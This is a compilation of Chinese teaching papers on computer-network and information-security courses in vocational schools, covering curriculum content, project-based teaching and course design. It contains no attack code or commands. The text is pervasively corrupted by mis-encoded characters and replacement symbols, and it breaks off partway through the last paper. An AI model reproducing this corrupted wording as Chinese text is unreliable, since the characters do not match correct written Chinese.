摘 要:針對當(dāng)前計(jì)算機(jī)網(wǎng)絡(luò)教學(xué)和目前中等職業(yè)技術(shù)學(xué)校計(jì)算教學(xué)的現(xiàn)狀,結(jié)合當(dāng)前計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)的發(fā)展和實(shí)際狀況,結(jié)合中等職業(yè)技術(shù)學(xué)校的學(xué)生特點(diǎn)�����,綜合網(wǎng)絡(luò)實(shí)際使用和培訓(xùn)的狀況�,對計(jì)算機(jī)網(wǎng)絡(luò)教學(xué)進(jìn)行詳細(xì)的分析和研究,嘗試尋找到一條適合中職計(jì)算機(jī)網(wǎng)絡(luò)教學(xué)方式,行成一套行之有效的教學(xué)方法�����。關(guān)鍵詞:中職計(jì)算機(jī)教育 計(jì)算機(jī)網(wǎng)絡(luò)技術(shù) 網(wǎng)絡(luò)教學(xué)中圖分類號:G712
文獻(xiàn)標(biāo)識碼:A
文章編號:1672-3791(2013)07(b)-0181-01現(xiàn)代社會的網(wǎng)絡(luò)技術(shù)已經(jīng)成為了人們?nèi)粘I畹闹匾M成部分���,隨著網(wǎng)絡(luò)技術(shù)的發(fā)展和變革���,社會和工作與網(wǎng)絡(luò)技術(shù)的關(guān)聯(lián)性越來越頻繁��,越來越不可或缺。無論是在企業(yè)還是在家庭�����,生活的每一個(gè)環(huán)節(jié)現(xiàn)在都在利用日益發(fā)展的網(wǎng)絡(luò)技術(shù)進(jìn)行連接�。從簡單的網(wǎng)站建設(shè)到復(fù)雜的物流網(wǎng),數(shù)據(jù)庫管理����,都與網(wǎng)絡(luò)技術(shù)息息相關(guān)�����。針對如此高速發(fā)展的網(wǎng)絡(luò)技術(shù)產(chǎn)業(yè),催生了大量的網(wǎng)絡(luò)技術(shù)人才的需求�����,同時(shí)對網(wǎng)絡(luò)技術(shù)的專業(yè)人才要求也提出了很高的要求��。在中等職業(yè)技術(shù)教育的課堂上���,計(jì)算網(wǎng)絡(luò)作為一門非常具有實(shí)用性的課程�����,已然已經(jīng)成為非常重要的一個(gè)學(xué)科。因此����,對該課程的教學(xué)工作也提出了很高的要求。本論文就計(jì)算機(jī)網(wǎng)絡(luò)實(shí)際操作的教學(xué)內(nèi)容,教學(xué)計(jì)劃和教學(xué)方法進(jìn)行了了研究和討論。1 計(jì)算機(jī)網(wǎng)絡(luò)實(shí)踐教學(xué)的教學(xué)大綱與教學(xué)計(jì)劃為了讓學(xué)生綜合利用所學(xué)的網(wǎng)絡(luò)知識�,擁有一些解決實(shí)際問題的能力����,能夠完成一些簡單的網(wǎng)絡(luò)管理�、組建、維護(hù)等工作,中等職業(yè)技術(shù)教學(xué)中設(shè)計(jì)了計(jì)算機(jī)網(wǎng)絡(luò)課程���,同時(shí)也對網(wǎng)絡(luò)知識的基本了解和基本設(shè)置了一些教學(xué)任務(wù)。應(yīng)對網(wǎng)絡(luò)在日常工作和生活中的應(yīng)用、網(wǎng)絡(luò)技術(shù)的發(fā)展����、網(wǎng)絡(luò)應(yīng)用中常出現(xiàn)的問題的解決方法����,讓學(xué)生對網(wǎng)絡(luò)環(huán)境的現(xiàn)狀和基本的問題做出準(zhǔn)確判斷�����,制訂出符合學(xué)生實(shí)際能力的教學(xué)大綱���。對學(xué)生的實(shí)際網(wǎng)絡(luò)基礎(chǔ)知識的能力評估后�,針對職業(yè)技術(shù)學(xué)校學(xué)生實(shí)際的基礎(chǔ)水平��,因人而異的設(shè)計(jì)一個(gè)側(cè)重于學(xué)生實(shí)際操作能力培養(yǎng)和鍛煉的教學(xué)計(jì)劃�,重點(diǎn)鍛煉學(xué)生在實(shí)際環(huán)境中對網(wǎng)絡(luò)技術(shù)的應(yīng)用。2 計(jì)算機(jī)網(wǎng)絡(luò)實(shí)踐教學(xué)的內(nèi)容2.1 基礎(chǔ)網(wǎng)絡(luò)知識實(shí)訓(xùn)基礎(chǔ)實(shí)訓(xùn)的主要目的是培訓(xùn)學(xué)生掌握基本網(wǎng)絡(luò)組建的能力�,通過培訓(xùn)��,要求學(xué)生能夠掌握基礎(chǔ)網(wǎng)絡(luò)組建和實(shí)施的能力,能夠獨(dú)立完成基礎(chǔ)的小型局域網(wǎng)絡(luò)的構(gòu)建并對構(gòu)建的網(wǎng)絡(luò)進(jìn)行驗(yàn)證�,對出現(xiàn)的問題能夠有解決方案�。實(shí)訓(xùn)內(nèi)容包括:ADSL撥號上網(wǎng)的設(shè)置�、制作雙絞線(直通線和交叉線)、設(shè)置多臺PC共享上網(wǎng)�����、配置WIFI路由器�、基礎(chǔ)交換機(jī)的配置��、基礎(chǔ)路由器配置�、交換機(jī)的級聯(lián)和鏈路聚合配置����、使用交換機(jī)劃分VLAN等。通過這些實(shí)訓(xùn),要求學(xué)生能夠獨(dú)立操作構(gòu)建一個(gè)小型綜合性網(wǎng)絡(luò)環(huán)境����,從設(shè)計(jì)�、布線����、配置到檢查糾錯的全過程,掌握一個(gè)較為全面的基礎(chǔ)網(wǎng)絡(luò)設(shè)置能力。2.2 網(wǎng)絡(luò)管理實(shí)訓(xùn)管理類實(shí)訓(xùn)的目的是培養(yǎng)學(xué)生管理網(wǎng)絡(luò)的方法和技術(shù)�,使其在未來的工作中擁有這方面的能力�。這實(shí)訓(xùn)主要內(nèi)容包括有:使用工具軟件分析網(wǎng)絡(luò)數(shù)據(jù)�����、學(xué)習(xí)掌握端口和MAC地址的綁定的知識�、了解交換機(jī)的端口鏡像����、了解虛擬專用網(wǎng)VPN的配置、學(xué)習(xí)IP地址的配置規(guī)劃、掌握基于802.1x的配置方法��、了解網(wǎng)絡(luò)帶寬的監(jiān)控維護(hù)等����。通過這些實(shí)訓(xùn)����,使學(xué)生基本掌握針對網(wǎng)絡(luò)設(shè)備的管理、故障處理�、性能管理��、網(wǎng)絡(luò)認(rèn)證和費(fèi)用管理等方面的能力,能夠進(jìn)行初步的網(wǎng)絡(luò)管理工作��。2.3 網(wǎng)絡(luò)綜合能力實(shí)訓(xùn)綜合類實(shí)訓(xùn)的目的:提高對網(wǎng)絡(luò)綜合應(yīng)用能力���,使學(xué)生部分滿足較為復(fù)雜的網(wǎng)絡(luò)環(huán)境的工作�。這方面的實(shí)訓(xùn)主要有:樹協(xié)議的啟用方法、三層交換機(jī)的VLAN配置��、配置ACL訪問控制列表�����、靜態(tài)路由配置����、動態(tài)路由RIP配置����、動態(tài)路由OSPF配置、利用單臂路由配置VLAN間互訪等��,這一部分為實(shí)訓(xùn)為更高級別的網(wǎng)絡(luò)知識培訓(xùn)���,對那些有一定興趣且基礎(chǔ)比較扎實(shí)的學(xué)生�,通過這部分的實(shí)訓(xùn)可以學(xué)習(xí)并掌握更加大范圍的網(wǎng)絡(luò)環(huán)境的知識,能夠掌握大型網(wǎng)絡(luò)的建網(wǎng)和配置的方法����。2.4 網(wǎng)絡(luò)安全實(shí)訓(xùn)這類實(shí)訓(xùn)的目的:通過實(shí)訓(xùn)��,使學(xué)生能夠在防止網(wǎng)絡(luò)侵入、網(wǎng)絡(luò)攻擊等方面掌握一定的專業(yè)能力���,能夠通過網(wǎng)絡(luò)安全的配置和對設(shè)備的理解應(yīng)對一般的網(wǎng)絡(luò)攻擊行為。實(shí)訓(xùn)內(nèi)容包括:網(wǎng)絡(luò)行為策略配置��、網(wǎng)絡(luò)監(jiān)聽���、操作系統(tǒng)安全配置���、防火墻的透明模式和NET配置�����、數(shù)據(jù)備份與恢復(fù)等�。通過此類實(shí)訓(xùn)�,使學(xué)生掌握一定的網(wǎng)絡(luò)安全相關(guān)技能。網(wǎng)絡(luò)安全是整個(gè)網(wǎng)絡(luò)技術(shù)的最頂端的技術(shù)���,對于中職的教學(xué),要求學(xué)生以了解和開闊視野為目的����,初步了解網(wǎng)絡(luò)安全方面的知識����。3 網(wǎng)絡(luò)技術(shù)實(shí)踐教學(xué)法對于計(jì)算機(jī)網(wǎng)絡(luò)教學(xué)��,如何提高學(xué)生對該課程的興趣是教學(xué)的最基本技巧�。教學(xué)方法的重要性就體現(xiàn)在如何在枯燥的教學(xué)中找到興趣點(diǎn)�,給學(xué)生提高成就感?�;谏鲜龅囊?�,我總結(jié)了以下幾個(gè)教學(xué)方法����。3.1 項(xiàng)目教學(xué)法在課堂上提出一個(gè)網(wǎng)絡(luò)構(gòu)建的項(xiàng)目����,讓學(xué)生以小組為單位完成整個(gè)網(wǎng)絡(luò)環(huán)境的設(shè)計(jì)���,規(guī)劃�����,配置和檢查��。給學(xué)生創(chuàng)造一個(gè)項(xiàng)目成功的成就感,同時(shí)加深對所學(xué)知識的掌握程度。3.2 示范教學(xué)法老師直接向?qū)W生展示一個(gè)復(fù)雜的網(wǎng)絡(luò)配置中使用到的技巧和方法����,讓學(xué)生充分認(rèn)識到網(wǎng)絡(luò)技術(shù)的千變?nèi)f化�,提高學(xué)生深入學(xué)習(xí)的興趣��。3.3 網(wǎng)絡(luò)教學(xué)法讓學(xué)生帶著問題去網(wǎng)絡(luò)中尋找他們想要找到的解答方法��,通過網(wǎng)絡(luò)學(xué)習(xí)網(wǎng)絡(luò)知識,讓學(xué)生了解最新最前端的網(wǎng)絡(luò)知識,以此來彌補(bǔ)課本上沒有提及的最新資訊和學(xué)習(xí)內(nèi)容�。在實(shí)際教學(xué)中�����,需要結(jié)合多種教學(xué)方法,以教學(xué)方法為項(xiàng)目教學(xué)法,項(xiàng)目是學(xué)會使用互聯(lián)網(wǎng)�。實(shí)訓(xùn)項(xiàng)目教學(xué)突的關(guān)鍵是培養(yǎng)學(xué)生獨(dú)立思考問題�、解決問題的能力�。因此在實(shí)訓(xùn)中,要重點(diǎn)在這方面加強(qiáng)輔導(dǎo)和培養(yǎng)。這樣的實(shí)訓(xùn)教學(xué)可以提高學(xué)生掌握知識的,切實(shí)提高學(xué)生對該課程知識的掌握����,提高他們進(jìn)入社會和工作崗位后的工作能力��。4 結(jié)語計(jì)算機(jī)技術(shù)的快速發(fā)展��,對計(jì)算網(wǎng)絡(luò)教學(xué)提出了更高的要求�。教師在教學(xué)中必須在深入了解社會和企業(yè)的實(shí)際需求情況下,結(jié)合學(xué)生的特點(diǎn)進(jìn)行更加側(cè)重于實(shí)際操作的教學(xué),讓學(xué)生在實(shí)訓(xùn)中發(fā)現(xiàn)問題���,分析問題并且解決問題。教師在整個(gè)教學(xué)過程中更多的應(yīng)該扮演一個(gè)引導(dǎo)、傾聽、引導(dǎo)和觀察的角色,以學(xué)生自己的思想作為學(xué)習(xí)的基本中心思想來學(xué)習(xí)。讓學(xué)生充分感受的“今天所學(xué)���、明天所用”的學(xué)以致用的思想。學(xué)生在這樣的思想驅(qū)動下子讓可以很快的提高學(xué)習(xí)的興趣,做到自主學(xué)習(xí)��,并且在走出校門踏上工作崗位后可以快速融入崗位���。參考文獻(xiàn)[1] 計(jì)算機(jī)網(wǎng)絡(luò)[M].清華大學(xué)出版社�,2008.[2] 孫憲君,呂濱.計(jì)算機(jī)網(wǎng)絡(luò)操作系統(tǒng)原理與應(yīng)用[M].機(jī)械工業(yè)出版社,2006.
第5篇
【關(guān)鍵詞】項(xiàng)目化教學(xué)����;計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)�;項(xiàng)目設(shè)計(jì)�����;應(yīng)用
一���、項(xiàng)目化教學(xué)法的含義
項(xiàng)目教學(xué)法是師生通過共同實(shí)施一個(gè)完整的項(xiàng)目工作而進(jìn)行的教學(xué)活動��。即以項(xiàng)目為載體,以工作任務(wù)為中心��,行為導(dǎo)向?yàn)榉椒?,以能力培養(yǎng)為目標(biāo),旨在將課堂教學(xué)與工作情境完美地結(jié)合起來,讓學(xué)生融入更有意義的工作任務(wù)中,通過任務(wù)的完成�����,讓學(xué)生自主學(xué)習(xí)�、自我提高��,實(shí)現(xiàn)知識的積累���、能力的提高和素質(zhì)的培養(yǎng)����。其目的在于加強(qiáng)課程內(nèi)容與工作之間的相關(guān)性���,整合理論與實(shí)踐���,提高學(xué)生技能培養(yǎng)的效率���。
二�����、《計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)》課程教學(xué)目標(biāo)
本課程的教學(xué)目標(biāo)是使學(xué)生掌握計(jì)算機(jī)網(wǎng)絡(luò)基礎(chǔ)理論及網(wǎng)絡(luò)組建技術(shù)�����,掌握目前應(yīng)用最廣泛的TCP/IP協(xié)議的基本知識,會組建小型局域網(wǎng)����,會安裝�����、配置常用的網(wǎng)絡(luò)服務(wù),能為各種常用的網(wǎng)絡(luò)服務(wù)提供技術(shù)支持���,能管理小型網(wǎng)絡(luò)����,對在網(wǎng)絡(luò)運(yùn)行過程中出現(xiàn)的故障進(jìn)行排除和解決,能保證網(wǎng)絡(luò)安全穩(wěn)定的運(yùn)行���。要想實(shí)現(xiàn)這一教學(xué)目標(biāo),必須深化改革,采用有效的教學(xué)方法——項(xiàng)目化教學(xué)����,讓學(xué)生在項(xiàng)目學(xué)習(xí)中具備局域網(wǎng)組網(wǎng)與管理的能力���。
三�、《計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)》課程采用項(xiàng)目教學(xué)法的必要性
(1)目前在計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)課程教學(xué)中存在理論和實(shí)踐相脫節(jié)的現(xiàn)象。教學(xué)內(nèi)容理論性太強(qiáng)��,一般教師在講授計(jì)算機(jī)網(wǎng)絡(luò)課程時(shí)更多的是采用傳統(tǒng)教育管理和教學(xué)模式�����。首先�����,對計(jì)算機(jī)網(wǎng)絡(luò)的概念、發(fā)展��、硬件組成等內(nèi)容進(jìn)行介紹���;其次��,介紹OSI七層模型���、TCP/IP 協(xié)議、各種網(wǎng)絡(luò)的功能;最后,介紹網(wǎng)絡(luò)的應(yīng)用與網(wǎng)絡(luò)安全的防范等知識。這種傳統(tǒng)的教學(xué)模式看起來教師已經(jīng)把計(jì)算機(jī)網(wǎng)絡(luò)知識全部傳授給了學(xué)生�,但對于學(xué)生來說如何管理和維護(hù)一個(gè)網(wǎng)絡(luò)仍無從下手��,學(xué)生對計(jì)算機(jī)網(wǎng)絡(luò)的認(rèn)識只停留在書本上。(2)教學(xué)手段和方法單一,教學(xué)效果不好��。教師在講授計(jì)算機(jī)網(wǎng)絡(luò)課程的過程中��,最容易犯的毛病就是“滿堂灌”���。內(nèi)容理論性強(qiáng)����,相對枯燥�����,學(xué)生看不到又摸不著�,很快會對計(jì)算機(jī)網(wǎng)絡(luò)從感興趣到失去興趣�����,這會直接導(dǎo)致學(xué)生上課走神����、不聽課����、教學(xué)互動差,達(dá)不到教學(xué)效果。針對平時(shí)教學(xué)中存在的問題,我們進(jìn)行教學(xué)改革���,改革教學(xué)手段和教學(xué)方法,把項(xiàng)目教學(xué)法引入網(wǎng)絡(luò)技術(shù)課堂中,可大大地激發(fā)學(xué)生的學(xué)習(xí)熱情����,使理論學(xué)習(xí)與崗位實(shí)踐需求統(tǒng)一起來。
四��、項(xiàng)目教學(xué)法在《計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)》課程中的實(shí)踐應(yīng)用
(1)項(xiàng)目設(shè)計(jì)���。項(xiàng)目教學(xué)法是師生通過共同實(shí)施一個(gè)完整的項(xiàng)目工作而進(jìn)行的教學(xué)活動�。首先要設(shè)計(jì)典型、實(shí)用的項(xiàng)目�。按照教學(xué)內(nèi)容的需求�,結(jié)合網(wǎng)絡(luò)真實(shí)的市場需求及學(xué)校的實(shí)際情況����,選取現(xiàn)實(shí)的對象、材料為項(xiàng)目�,項(xiàng)目既要包含基本的教學(xué)知識點(diǎn)�����,又能調(diào)動學(xué)生解決問題的積極性���,還便于學(xué)生對知識的遷移和融會貫通�����。如組建一個(gè)小型局域網(wǎng)絡(luò)這一項(xiàng)目,主要是培養(yǎng)學(xué)生組建網(wǎng)絡(luò)、管理網(wǎng)絡(luò)的能力,要求學(xué)生通過項(xiàng)目實(shí)訓(xùn)熟悉網(wǎng)絡(luò)工程的實(shí)施流程和方案設(shè)計(jì)方法,完成小型家庭辦公網(wǎng)絡(luò)的構(gòu)建��。根據(jù)這一過程��,可將其分成7個(gè)子項(xiàng)目:小型局域網(wǎng)的需求分析及可行性論證�;小型局域網(wǎng)網(wǎng)絡(luò)規(guī)劃�����;組網(wǎng)設(shè)備及預(yù)算�����;網(wǎng)絡(luò)施工(虛擬網(wǎng)絡(luò)環(huán)境/架設(shè)部分網(wǎng)絡(luò))����;接入Internet;網(wǎng)絡(luò)安全與管理��;簽合同及技術(shù)文檔�����。(2)項(xiàng)目實(shí)訓(xùn)內(nèi)容�����。為實(shí)現(xiàn)各個(gè)子項(xiàng)目,我們將每個(gè)子項(xiàng)目劃分為若干個(gè)任務(wù)�。如小型局域網(wǎng)需求分析及可行性論證需掌握網(wǎng)絡(luò)的基本理論知識�,網(wǎng)絡(luò)系統(tǒng)組成�����、網(wǎng)絡(luò)分類���、傳輸介質(zhì)�����、網(wǎng)絡(luò)通信協(xié)議、網(wǎng)絡(luò)操作系統(tǒng)及網(wǎng)絡(luò)安全等知識�����,此項(xiàng)目要求學(xué)生根據(jù)客戶需求�,靈活運(yùn)用網(wǎng)絡(luò)知識設(shè)計(jì)網(wǎng)絡(luò)方案�。小型局域網(wǎng)網(wǎng)絡(luò)規(guī)劃包括使用Visio軟件繪制網(wǎng)絡(luò)拓?fù)鋱D、思科模擬器(Packet Tracer)的安裝及使用、根據(jù)實(shí)際需要布線���。組網(wǎng)設(shè)備及預(yù)算包括雙絞線的制作、光纖熔接。網(wǎng)絡(luò)施工(虛擬網(wǎng)絡(luò)環(huán)境/架設(shè)部分網(wǎng)絡(luò))包括Virtual PC安裝、服務(wù)器端及客戶機(jī)端操作系統(tǒng)安裝、雙機(jī)互聯(lián)�����、多機(jī)互聯(lián)�、IP設(shè)置及劃分、交換機(jī)的基本配置及級聯(lián)、劃分VLAN、使用路由器的基本配置��、網(wǎng)絡(luò)資源共享���。架設(shè)網(wǎng)絡(luò)服務(wù)包括Active Directory安裝與配置�����、DNS安裝與配置��、DHCP安裝與配置、WWW服務(wù)器的安裝與配置���、FTP服務(wù)器的安裝與配置���、郵件服務(wù)器的安裝與配置六個(gè)任務(wù)����。接入Internet包括常用的局域網(wǎng)接入Internet方法:ADSL接入方式���、“光纖+LAN”的因特網(wǎng)接入��、無線接入方式(組建Ad-hoc模式網(wǎng)絡(luò)����、組建Infrastructure模式網(wǎng)絡(luò))����。局域網(wǎng)共享Internet連接(文件共享和打印機(jī)共享)����,還會涉及網(wǎng)絡(luò)命令及網(wǎng)絡(luò)故障診斷實(shí)訓(xùn)內(nèi)容。網(wǎng)絡(luò)安全與管理包括系統(tǒng)自帶的安全管理工具�、計(jì)算機(jī)網(wǎng)絡(luò)安全措施兩個(gè)任務(wù)�����。這方面的實(shí)訓(xùn)主要有:使用抓包工具軟件分析網(wǎng)絡(luò)數(shù)據(jù)、交換機(jī)的端口鏡像、端口和MAC 地址的綁定��、服務(wù)配置��、網(wǎng)絡(luò)帶寬的監(jiān)控維護(hù)等�。簽合同及技術(shù)文檔�,讓學(xué)生了解合同的使用方法及注意事項(xiàng)。(3)項(xiàng)目實(shí)施。一是創(chuàng)設(shè)教學(xué)情境�����。項(xiàng)目教學(xué)法主要是以項(xiàng)目引領(lǐng)�,任務(wù)驅(qū)動貫穿整個(gè)教學(xué)。教師要創(chuàng)設(shè)與教學(xué)內(nèi)容相關(guān)的教學(xué)情境,引出項(xiàng)目后應(yīng)適時(shí)以恰當(dāng)?shù)男问礁嬷畬W(xué)生具體而明確的學(xué)習(xí)目標(biāo)和任務(wù)�����,分析出教材中的重點(diǎn)�����、難點(diǎn)���,提煉出教材中的要點(diǎn),精心編寫一些典型的�。把理論講解和技能訓(xùn)練統(tǒng)一安排�,把老師活動和學(xué)生活動統(tǒng)一安排���,把教學(xué)過程和自主學(xué)習(xí)統(tǒng)一安排�����。二是改革教學(xué)手段和教學(xué)方法��。《計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)》是一門理論性和實(shí)踐性都很強(qiáng)的課程�,要使項(xiàng)目教學(xué)法成效顯著����,必須重視網(wǎng)絡(luò)實(shí)訓(xùn)環(huán)境的建設(shè)����,有相應(yīng)的硬件設(shè)備和軟件配置,保證大部分項(xiàng)目實(shí)訓(xùn)能夠?qū)崿F(xiàn)�。對于某些不能實(shí)現(xiàn)的子項(xiàng)目要安裝模擬軟件����、建立虛擬實(shí)驗(yàn)室和參觀校園網(wǎng)絡(luò)建設(shè)來達(dá)到目的����。還要將多種現(xiàn)代化教學(xué)手段引入課堂。教學(xué)方法多樣化��,如類比教學(xué)方法,把網(wǎng)絡(luò)中一些枯燥����、抽象的計(jì)的概念用實(shí)際生活中人們熟悉的事物與理論進(jìn)行類比���,幫助學(xué)生直觀、形象地理解和掌握計(jì)算機(jī)網(wǎng)絡(luò)理論知識����,使抽象���、神秘的問題變得通俗易懂���。(4)項(xiàng)目評價(jià)�。學(xué)生學(xué)習(xí)的效果直接由完成項(xiàng)目的情況來衡量�,先是對學(xué)生參與的學(xué)習(xí)成果進(jìn)行評價(jià)。各單項(xiàng)任務(wù)的完成情況���,這些項(xiàng)目任務(wù)能體現(xiàn)本門課程的知識和技能。如繪制實(shí)訓(xùn)室網(wǎng)絡(luò)拓?fù)鋱D�����;雙絞線制作�����;雙機(jī)互連的完成情況����。然后教師再根據(jù)學(xué)生參與項(xiàng)目教學(xué)的態(tài)度和創(chuàng)造性����,解決實(shí)踐中問題的能力,評判學(xué)生的自學(xué)能力與解決問題的能力���。完成任務(wù)過程中的態(tài)度、表現(xiàn)����,還從另一個(gè)側(cè)面反映學(xué)生的綜合素質(zhì),只要項(xiàng)目任務(wù)設(shè)計(jì)適當(dāng)�����,考核方式合適���,就能很好地調(diào)動學(xué)生自主學(xué)習(xí)的積極性���,較好地實(shí)現(xiàn)課程的教學(xué)目標(biāo)��?����?砂ń處熢u價(jià)、學(xué)習(xí)小組評價(jià)和自評三部分。除了對學(xué)生的學(xué)習(xí)項(xiàng)目完成情況進(jìn)行評價(jià)外����,教師還應(yīng)在教學(xué)項(xiàng)目完成后及時(shí)進(jìn)行總結(jié)反思��,對項(xiàng)目教學(xué)過程中出現(xiàn)的問題及考核過程中出現(xiàn)的問題進(jìn)行細(xì)致分析和研究,及時(shí)完善項(xiàng)目內(nèi)容及考核方法,為下次教學(xué)積累經(jīng)驗(yàn)�����。
五����、結(jié)語
《計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)》課程是內(nèi)容多,范圍廣��,知識更新快����,且理論性和實(shí)踐性都很強(qiáng)。作為教師,我們必須緊貼網(wǎng)絡(luò)實(shí)際情況,設(shè)計(jì)典型實(shí)用的項(xiàng)目,從真實(shí)的網(wǎng)絡(luò)應(yīng)用入手講解網(wǎng)絡(luò)的組建、應(yīng)用��、管理和維護(hù)�,提高學(xué)生分析問題、動手能力和解決實(shí)際問題的能力。只要把項(xiàng)目教學(xué)法用好用活����,學(xué)生就會感到學(xué)這門課程是非常有用的�,會積極地投入到項(xiàng)目學(xué)習(xí)中去�,更好地實(shí)現(xiàn)既定的教學(xué)目標(biāo)。
參 考 文 獻(xiàn)
第6篇
關(guān)鍵詞 說課 信息安全 教學(xué) 課程
中圖分類號:G424 文獻(xiàn)標(biāo)識碼:A
0 引言
本課程為信息安全專業(yè)職業(yè)崗位課程,服務(wù)于高職高專人才培養(yǎng)規(guī)劃���,堅(jiān)持以行動任務(wù)為導(dǎo)向,工學(xué)結(jié)合培養(yǎng)為主線的人才培養(yǎng)模式。培養(yǎng)學(xué)生從事網(wǎng)絡(luò)安全方案設(shè)計(jì)、網(wǎng)絡(luò)操作系統(tǒng)安全部署、網(wǎng)絡(luò)維護(hù)�、信息安全管理等相關(guān)工作���。本文從課程定位與目標(biāo)�����、課程設(shè)計(jì)、教學(xué)內(nèi)容和組織、教學(xué)組織與實(shí)施���、實(shí)踐條件與教學(xué)效果、教學(xué)隊(duì)伍�����、教學(xué)改革與特色創(chuàng)新七個(gè)方面對課程進(jìn)行詳細(xì)的闡述�,對教學(xué)理念進(jìn)行符合高職教學(xué)規(guī)律的深層次的梳理。
1 課程定位與目標(biāo)
1.1 崗位需求(如圖1)
1.2 課程定位
信息安全基礎(chǔ)是高職高專3年制信息安全專業(yè)的一門必修職業(yè)基礎(chǔ)課程,一般安排在第一學(xué)期開設(shè)�����,在專業(yè)課程體系中起著引領(lǐng)專業(yè)課程體系的作用���,其后續(xù)課程為安全防護(hù)工具�、服務(wù)器安全防護(hù)和防火墻配置應(yīng)用�����。
1.3 課程學(xué)習(xí)目標(biāo)
(1)學(xué)習(xí)能力目標(biāo)�����。通過本課程的學(xué)習(xí),進(jìn)一步培養(yǎng)學(xué)生的自主學(xué)習(xí)能力��,掌握網(wǎng)絡(luò)安全防護(hù)的基本過程和方法���。
(2)職業(yè)能力目標(biāo)�����。了解我國網(wǎng)絡(luò)安全狀況和相應(yīng)的政策和法律法規(guī)����,熟悉網(wǎng)絡(luò)安全防護(hù)項(xiàng)目的實(shí)施過程和要領(lǐng)�,能夠熟練進(jìn)行客戶機(jī)和服務(wù)器加固操作,能夠設(shè)計(jì)和實(shí)施中小型網(wǎng)絡(luò)的安全防護(hù)方案�����,了解大型網(wǎng)絡(luò)安全防護(hù)方案的設(shè)計(jì)與實(shí)施要領(lǐng)�����。
(3)職業(yè)素養(yǎng)目標(biāo)����。通過項(xiàng)目設(shè)計(jì)培養(yǎng)學(xué)生的統(tǒng)籌規(guī)劃能力和工程文檔編寫能力�����,通過項(xiàng)目合作培養(yǎng)學(xué)生的團(tuán)隊(duì)合作意識和能力����。
2 課程設(shè)計(jì)
以培養(yǎng)學(xué)生從事網(wǎng)絡(luò)構(gòu)建�、網(wǎng)絡(luò)管理與維護(hù)工作崗位所需的知識與技能為中心來組織教學(xué)。信息安全基礎(chǔ)的課程開發(fā)流程:市場調(diào)研與召開實(shí)踐專家研討會 確定相關(guān)職業(yè)崗位群的典型工作任務(wù) 歸納行動領(lǐng)域 行動領(lǐng)域轉(zhuǎn)換為學(xué)習(xí)領(lǐng)域 學(xué)習(xí)情境設(shè)計(jì) 學(xué)習(xí)子情境設(shè)計(jì) 課程教學(xué)資料建設(shè) 實(shí)際教學(xué)檢驗(yàn)�。為了保障課程與技術(shù)發(fā)展相一致����,建議完成每個(gè)教學(xué)周期后�,課程組均要依據(jù)以上課程開發(fā)流程對課程標(biāo)準(zhǔn)和課程內(nèi)容進(jìn)行修訂。
3 教學(xué)內(nèi)容和組織
3.1 教學(xué)內(nèi)容選取
根據(jù)當(dāng)前網(wǎng)絡(luò)安全項(xiàng)目的規(guī)模�����,可將網(wǎng)絡(luò)安全防護(hù)客戶劃分為普通網(wǎng)絡(luò)用戶(ADSL接入)�、中小型網(wǎng)絡(luò)和大型網(wǎng)絡(luò),由此根據(jù)教學(xué)單元設(shè)計(jì)內(nèi)容涉及信息安全基礎(chǔ)知識����、信息系統(tǒng)安全體系�、信息加密技術(shù)和網(wǎng)絡(luò)安全實(shí)用技術(shù)方面來確定網(wǎng)絡(luò)安全防護(hù)學(xué)習(xí)領(lǐng)域的學(xué)習(xí)情景如圖2����。
3.2 教學(xué)內(nèi)容子情境設(shè)計(jì)組織
(1)普通網(wǎng)絡(luò)用戶安全防護(hù)學(xué)習(xí)子情境設(shè)計(jì)如表1。
(2)中小型網(wǎng)絡(luò)安全防護(hù)學(xué)習(xí)子情境設(shè)計(jì)如表2��。
(3)典型校園網(wǎng)全防護(hù)學(xué)習(xí)子情境設(shè)計(jì)如表3����。
4 教學(xué)組織實(shí)施與重點(diǎn)難點(diǎn)
4.1 教學(xué)組織實(shí)施
在整個(gè)教學(xué)過程中,學(xué)生一般以小組的形式進(jìn)行工作學(xué)習(xí)���。在任務(wù)工作過程系統(tǒng)化設(shè)計(jì)情境學(xué)習(xí)中�����,要求每個(gè)小組選出一名同學(xué)擔(dān)當(dāng)組長����,組長的職責(zé)是負(fù)責(zé)全隊(duì)的組織協(xié)調(diào)�,分配任務(wù),組織討論,提交實(shí)踐報(bào)告�����,成果演示錄像呈現(xiàn)�,給其他組員評分等。
在具體實(shí)施教學(xué)過程中,本課程組把基于工作過程教學(xué)模式中的六步行動過程總結(jié)為教學(xué)中的四個(gè)環(huán)節(jié):任務(wù)明確、教師示范��、學(xué)生實(shí)踐��、展示評價(jià)�����。在這四個(gè)環(huán)節(jié)中,分別把握學(xué)生應(yīng)該掌握的知識和任務(wù),順利完成教學(xué)和對學(xué)生的訓(xùn)練�����。
4.2 教學(xué)重點(diǎn)
普通網(wǎng)絡(luò)用戶安全防護(hù)方案的制定與實(shí)施:由教師首先講解并演示W(wǎng)indows XP的安全防護(hù)操作�,學(xué)生先學(xué)后做;教師指導(dǎo)學(xué)生進(jìn)行Vista安全防護(hù)方案的設(shè)計(jì)與實(shí)施,學(xué)生邊學(xué)邊做;教師組織學(xué)生自主進(jìn)行Windows 7安全防護(hù)方案的設(shè)計(jì)與實(shí)施�����。
中小型典型網(wǎng)絡(luò)的安全防護(hù)方案的制定與實(shí)施:由教師講解典型網(wǎng)站安全防護(hù)方案的設(shè)計(jì)與實(shí)施���,學(xué)生先學(xué)后做�����;教師指導(dǎo)學(xué)生進(jìn)行典型網(wǎng)吧安全防護(hù)方案的設(shè)計(jì)與實(shí)施,學(xué)生邊學(xué)邊做����;教師組織學(xué)生自主進(jìn)行典型企業(yè)網(wǎng)絡(luò)安全防護(hù)方案的設(shè)計(jì)與實(shí)施��。
4.3 教學(xué)難點(diǎn)
網(wǎng)絡(luò)安全防護(hù)工程方案的設(shè)計(jì)與實(shí)施:通過Windows XP、Vista�����、Windows 7、典型網(wǎng)站、典型網(wǎng)吧和典型企業(yè)網(wǎng)絡(luò)安全防護(hù)方案的設(shè)計(jì)與實(shí)施,掌握一般網(wǎng)絡(luò)安全防護(hù)方案的設(shè)計(jì)與實(shí)施���。
